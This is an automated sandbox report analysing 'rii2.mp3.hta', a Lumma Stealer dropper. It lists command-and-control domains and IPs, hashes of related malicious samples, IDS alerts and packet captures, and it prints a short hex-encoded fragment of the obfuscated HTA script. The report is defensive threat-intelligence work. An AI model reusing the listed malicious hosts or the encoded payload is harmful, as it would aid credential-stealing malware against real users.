                                                                                  https://misha-lomonosov.com/UOpowershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  104.21.14.233
                                                                                  misha-lomonosov.comUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  188.114.97.3
                                                                                  degreehourz.clickEuropean Union
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  104.26.11.53
                                                                                  h2.errantrefrainundocked.shopUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  104.102.49.254
                                                                                  steamcommunity.comUnited States
                                                                                  16625AKAMAI-ASUSfalse
                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1589497
                                                                                  Start date and time:2025-01-12 17:23:08 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 7m 37s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:11
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:rii2.mp3.hta
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.evad.winHTA@10/6@12/4
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 50%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 91%
                                                                                  • Number of executed functions: 171
                                                                                  • Number of non-executed functions: 46
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .hta
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 2.23.242.162, 13.107.246.45, 172.202.163.200, 173.222.162.64
                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target mshta.exe, PID 2084 because there are no executed function
                                                                                  • Execution Graph export aborted for target powershell.exe, PID 6536 because it is empty
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  TimeTypeDescription
                                                                                  11:24:01API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                  11:24:19API Interceptor1x Sleep call for process: dllhost.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  104.21.14.233https://adns2.blob.core.windows.net/adns2/21.html#cl/11677_md/2000/2794/2021/49922/7518Get hashmaliciousHTMLPhisherBrowse
                                                                                    188.114.97.3gem2.exeGet hashmaliciousUnknownBrowse
                                                                                    • wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                                                    qbSIgCrCgw.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.zkdamdjj.shop/kf1m/
                                                                                    8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rtpwslot888gol.sbs/jmkz/
                                                                                    1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rgenerousrs.store/o362/
                                                                                    suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.zkdamdjj.shop/swhs/
                                                                                    k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.einpisalpace.shop/8g74/?cNPH=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO&EtJTX=_JVX4ryxDRQpLJF
                                                                                    wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.supernutra01.online/rk61/
                                                                                    NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.vh5g.sbs/rjsl/
                                                                                    KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.beylikduzu616161.xyz/2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy
                                                                                    GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                                                    • /api/get/dll
                                                                                    104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                    • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                    http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                    • www.valvesoftware.com/legal.htm
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    steamcommunity.com176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    x.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    SDIO_R773.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.102.49.254
                                                                                    b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    Setup.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.102.49.254
                                                                                    misha-lomonosov.com176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                    • 172.67.160.193
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUSmNPTwHOuvT.exeGet hashmaliciousVidarBrowse
                                                                                    • 172.64.41.3
                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.162.17
                                                                                    gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                    • 104.26.13.205
                                                                                    Loader.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.16.184.241
                                                                                    v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                    • 104.21.85.189
                                                                                    installer_1.05_37.4.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.16.1
                                                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.34.147
                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.139.144
                                                                                    PDF-523.msiGet hashmaliciousAteraAgentBrowse
                                                                                    • 104.18.18.106
                                                                                    E6wUHnV51P.exeGet hashmaliciousDCRatBrowse
                                                                                    • 104.21.12.142
                                                                                    CLOUDFLARENETUSmNPTwHOuvT.exeGet hashmaliciousVidarBrowse
                                                                                    • 172.64.41.3
                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.162.17
                                                                                    gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                    • 104.26.13.205
                                                                                    Loader.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.16.184.241
                                                                                    v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                    • 104.21.85.189
                                                                                    installer_1.05_37.4.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.16.1
                                                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.34.147
                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.139.144
                                                                                    PDF-523.msiGet hashmaliciousAteraAgentBrowse
                                                                                    • 104.18.18.106
                                                                                    E6wUHnV51P.exeGet hashmaliciousDCRatBrowse
                                                                                    • 104.21.12.142
                                                                                    CLOUDFLARENETUSmNPTwHOuvT.exeGet hashmaliciousVidarBrowse
                                                                                    • 172.64.41.3
                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.162.17
                                                                                    gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                    • 104.26.13.205
                                                                                    Loader.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.16.184.241
                                                                                    v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                    • 104.21.85.189
                                                                                    installer_1.05_37.4.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.16.1
                                                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.34.147
                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.139.144
                                                                                    PDF-523.msiGet hashmaliciousAteraAgentBrowse
                                                                                    • 104.18.18.106
                                                                                    E6wUHnV51P.exeGet hashmaliciousDCRatBrowse
                                                                                    • 104.21.12.142
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    3b5074b1b5d032e5620f69f9f700ff0esZSXKXOnBw.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.11.53
                                                                                    sZSXKXOnBw.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.11.53
                                                                                    v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                    • 104.26.11.53
                                                                                    c2.htaGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.11.53
                                                                                    E6wUHnV51P.exeGet hashmaliciousDCRatBrowse
                                                                                    • 104.26.11.53
                                                                                    resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                    • 104.26.11.53
                                                                                    c1.htaGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.11.53
                                                                                    http://www.grhga.icu/Get hashmaliciousUnknownBrowse
                                                                                    • 104.26.11.53
                                                                                    http://keystonerelated.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.26.11.53
                                                                                    https://telegrams-mc.org/Get hashmaliciousUnknownBrowse
                                                                                    • 104.26.11.53
                                                                                    a0e9f5d64349fb13191bc781f81f42e1installer_1.05_37.4.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    • 104.21.14.233
                                                                                    • 188.114.97.3
                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    • 104.21.14.233
                                                                                    • 188.114.97.3
                                                                                    176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    • 104.21.14.233
                                                                                    • 188.114.97.3
                                                                                    Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    • 104.21.14.233
                                                                                    • 188.114.97.3
                                                                                    x.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    • 104.21.14.233
                                                                                    • 188.114.97.3
                                                                                    SDIO_R773.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    • 104.21.14.233
                                                                                    • 188.114.97.3
                                                                                    176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    • 104.21.14.233
                                                                                    • 188.114.97.3
                                                                                    4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    • 104.21.14.233
                                                                                    • 188.114.97.3
                                                                                    5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.102.49.254
                                                                                    • 104.21.14.233
                                                                                    • 188.114.97.3
                                                                                    b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.102.49.254
                                                                                    • 104.21.14.233
                                                                                    • 188.114.97.3
                                                                                    No context
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):5829
                                                                                    Entropy (8bit):4.901113710259376
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                    MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                    SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                    SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                    SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1216
                                                                                    Entropy (8bit):5.379988226522393
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:3YWSKco4KmM6GjKbm51s4RPQoUebIl+mZ9tXt/NK3R8e9r2:oWSU4YymI4RIoUeU+mZ9tlNWR82S
                                                                                    MD5:713B7D85EAF2649B5693C3241622081B
                                                                                    SHA1:EF862EA2BCAF4712B3A80C1974E3B2CF0177EE55
                                                                                    SHA-256:30FB7A3808679346BA53B4310FF1EA894D6CF6C71383ED1C0E4C3FD76D86CBEB
                                                                                    SHA-512:2F2EF3975B6A487259395D72BFD087A7C6260C7FD67E4D39A34BE73B45ED4D903B6CACAE5CDC7E8602A73C9E4A07189A6518B667D46D73A5E88412D9C96C2845
                                                                                    Malicious:false
                                                                                    Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    File type:data
                                                                                    Entropy (8bit):4.62608969953884
                                                                                    TrID:
                                                                                      File name:rii2.mp3.hta
                                                                                      File size:785'640 bytes
                                                                                      MD5:a181e4f186f156cbb238984f8a5bf4e6
                                                                                      SHA1:58c4adc3d4a848ae10bc29cf97dc5a70efa4c939
                                                                                      SHA256:007969cf64583d251ed63eda2c365f6cbfd768f37d05e699415d166021b3e294
                                                                                      SHA512:83eabfd9ae3c0439c6c7d6f15af5556f37d2d178e46437760de0f001d4b0b661fddb10ee052e0d47b06432cb6dea108519644cddd5c583407cc9d934988ad636
                                                                                      SSDEEP:6144:I9n5JOKEnJ6QkzxGDJBQxzxGWQwuICQQkzxGFABdBJQQkzxGpw3QkzxGk1nQkzhr:on5wKL1wKbK0K4KOUKoKZKIKl
                                                                                      TLSH:3FF46C4A8BB2A228E5345034EDD9477531B47CCC88999B0985EEF43178871F93EC9AFD
                                                                                      File Content Preview:66I75S6eh63Z74A69c6fr6eV20F59M73w6dZ62d74E50y28Z73F69u61h75s29A7bZ76X61u72o20T48S6eQ69Y4fP3de20q27C27j3bd66I6fM72p20H28K76r61t72e20J6bC57g79P47e20b3dU20e30B3br6bc57H79j47v20m3cl20h73K69a61x75p2ei6cF65W6et67a74p68M3bP20n6bW57B79H47u2bN2bs29H7bD76n61o72D20l
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2025-01-12T17:25:23.601900+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649992188.114.97.3443TCP
                                                                                      2025-01-12T17:25:24.074509+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649992188.114.97.3443TCP
                                                                                      2025-01-12T17:25:24.074509+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649992188.114.97.3443TCP
                                                                                      2025-01-12T17:25:24.864196+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649993104.102.49.254443TCP
                                                                                      2025-01-12T17:25:25.390632+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.649993104.102.49.254443TCP
                                                                                      2025-01-12T17:25:25.992394+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649994104.21.14.233443TCP
                                                                                      2025-01-12T17:25:26.436129+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649994104.21.14.233443TCP
                                                                                      2025-01-12T17:25:26.436129+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649994104.21.14.233443TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 12, 2025 17:24:03.110258102 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:03.110349894 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:03.110440016 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:03.210310936 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:03.210370064 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:03.715780973 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:03.715857029 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:03.719146013 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:03.719156981 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:03.719575882 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:03.733406067 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:03.775335073 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.344105005 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.344150066 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.344183922 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.344217062 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.344230890 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.344254017 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.344266891 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.344293118 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.344350100 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.344393015 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.344428062 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.344453096 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.344527006 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.344633102 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.344809055 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.344822884 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.348692894 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.348797083 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.348809958 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.400362968 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.436150074 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.436327934 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.436418056 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.436454058 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.436464071 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.436533928 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.436539888 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.437174082 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.437262058 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.437292099 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.437299013 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.437361002 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.437400103 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.437975883 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.438050985 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.438057899 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.438131094 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.438189030 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.438195944 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.438283920 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.438363075 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.438400984 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.438406944 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.438504934 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.438987970 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.439172029 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.439260960 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.439296007 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.439302921 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.439393997 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.439400911 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.440116882 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.440196037 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.440201998 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.440907001 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.441108942 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.441117048 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.494206905 CET49712443192.168.2.6104.26.11.53
                                                                                      Jan 12, 2025 17:24:04.528505087 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.528712034 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.528844118 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.528943062 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.528964043 CET44349712104.26.11.53192.168.2.6
                                                                                      Jan 12, 2025 17:24:04.529052019 CET49712443192.168.2.6104.26.11.53
